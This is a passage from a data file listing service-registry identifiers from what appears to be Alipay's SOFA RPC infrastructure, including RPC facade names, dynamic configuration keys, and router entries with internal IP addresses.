NSTANCE_ID#@#SOFA","com.alipay.fc.datacontext.service.facade.CumulateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.conf.facade.NearConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_CSS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.requiremng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sdaota.common.service.client.service.OtaDownService:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.core.service.signcontract.InstSignContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.InterflowFinancePlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.InsUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointJFBAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loadcenter.common.service.facade.ExportProjectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.logLevelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.ranking.parameter.StarWishDRMResource.deleteTailInterVal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acdoccore.common.service.facade.category.CloudCategoryVideoExpansionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyfbi.common.service.facade.alert.AlertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.YEBVirtualTAConfigDrm.taConvertStartDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecsign.common.service.facade.common.CacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdac.profile.common.service.facade.crowd.CrowdMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.subject.api.SubjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@exratecenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.socialcore.facade.ps.growth.GrowthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.data.HainaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.common.service.client.service.OtaDownService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.MerchantMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotvilla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.116.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.84.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.71.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.ifcidentitycloud.common.service.facade.nac.service.LisaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:certifymngPermlimitOpCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.auth.AuthService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatLinkCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.106.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imif.common.service.facade.v2.LabelCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CreditAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransBatchTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.SPUSKUQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zim.common.service.facade.business.api.ZimSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.SubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.CcrActivityConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.bg.api.cache.BgCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secudownload.common.service.facade.stragegy.api.FinMarketingQuotaAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.auth.AuthQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.40.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.predictproxy.biz.profile.ProfileService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csportal.service.facade.api.HKCustomerUserQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradePayWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.SysParamRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_creditgovernance_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.infosec.content.service.facade.RiskSampleLibService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.vul.VulManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finauth@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprotocol.common.facade.service.FundProtocolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpDataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insttrade.insttrade_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:invoicecommercial@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_MINISELFOP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertBindingService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qagraphknowledge.common.service.facade.graph.GraphAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradeapcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.lisa.AlipayAuthProdExecuteService:1.0:lisaTransferProdExecuteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.tenant.facade.TenantConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.CharityClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:fcprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.crossLocationsList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.sysSnapshotAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.123.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csmonitor.common.service.facade.WarningRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IOTCMS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.mobile.SecurityValidateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.SkylineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcb:name=com.alipay.finbaservice.common.service.facade.drm.FinbaserviceMigrateDrm.facades,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.charityasset.common.service.facade.api.TransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.koubei.kbdinningcenter.common.service.facade.cart.CartServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6253@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.InstSaleForbiddenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsClaimReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.common.service.facade.api.ChannelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.DrmResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.levelzero.api.LztransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.code.CodeValidateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.FalconIdsRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.targetConfigTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.biz.shared.repository.BusinessTypeMappingRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@contentlib#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.secucommunity.common.service.facade.feed.api.FeedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.withdraw.api.WithdrawQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.membercenter:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aistudio.facade.AiStudioAssetsRegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConstraintManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.operation.common.service.facade.api.label.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.org.BusinessRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:censor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.voucher.VoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_voucherTemplateSuccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.repaydefer.RepayDeferBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.UserPurchaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.BatchTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.BenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcapplycore.common.service.facade.apply.ApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_AGGRBILLINFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.176.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.gildata.QsShareStruFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.solution.sst.facade.SstMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.blackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpromocore.common.manage.facade.CrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.ScheduleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sigmaboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.ComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.customer.CustomerQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.operating.facade.service.RiskTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardAccountRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.config.MergeChargeInstConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_STMTMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acrescore.facade.SupplierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.FdbudgetBackendViewManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opinioncore.facade.yq.OpCorePushMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerUserIdManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.TenantServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_INDICATOR_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.253.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csguide.service.facade.api.AnchorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.rest.MigrateRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.facade.rzone.ContractOperateRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.UserContextFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductOrderQuerySofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openaccess.facade.service.check.AccessOrderDataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.ipayCashierSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.core.velocity.service.VelocityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.midas.service.facade.api.MetadataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AuthTextManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:creativecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppcore.facade.ProcessBillStatusFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:instradeprod_sdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.consultant.ConsultantQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataquery.bill.service.facade.adaptor.service.report.KbTradeReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipayplus.mobile.component.common.facade.urlshortener.UrlShorteningService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antlescenter.common.service.facade.api.AesSignFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.TestCaseDoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.assetapply.AssetBindShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.177.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseExternalSystemFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.53.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.service.IPAccessServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.riskmng.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.partner.api.PartnerProfileManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iusergrowthus.facade.api.PageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FPORGASSETCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.BizInfoUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:zmguardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.datasend04#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingNotifyTypeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.ProphetFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifyocr.common.service.facade.NluDialogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.6.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:innersource-community@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.grayroute.RouteFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_PAIDCARD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.mart.facade.AssetCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ResUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctransquery.common.service.facade.api.FundAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.FinVirtualTransOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.cds.mng.ProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointFlowinQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.einvoice.boss.client.service.EinvoiceMerchantService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.support.ArrangementBlackListMigrateDrm.migrateShardIdRangeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.ArDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.globalBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.voucherprod.facade.api.asset.VcpAssetEventProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:asyncAsttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.manualProcessOrderIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantSubService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dacuprod.service.facade.ActivityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.chaos.dig.facade.data.DataPrimaryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.core.service.InspectServiceDataDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.NameListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_1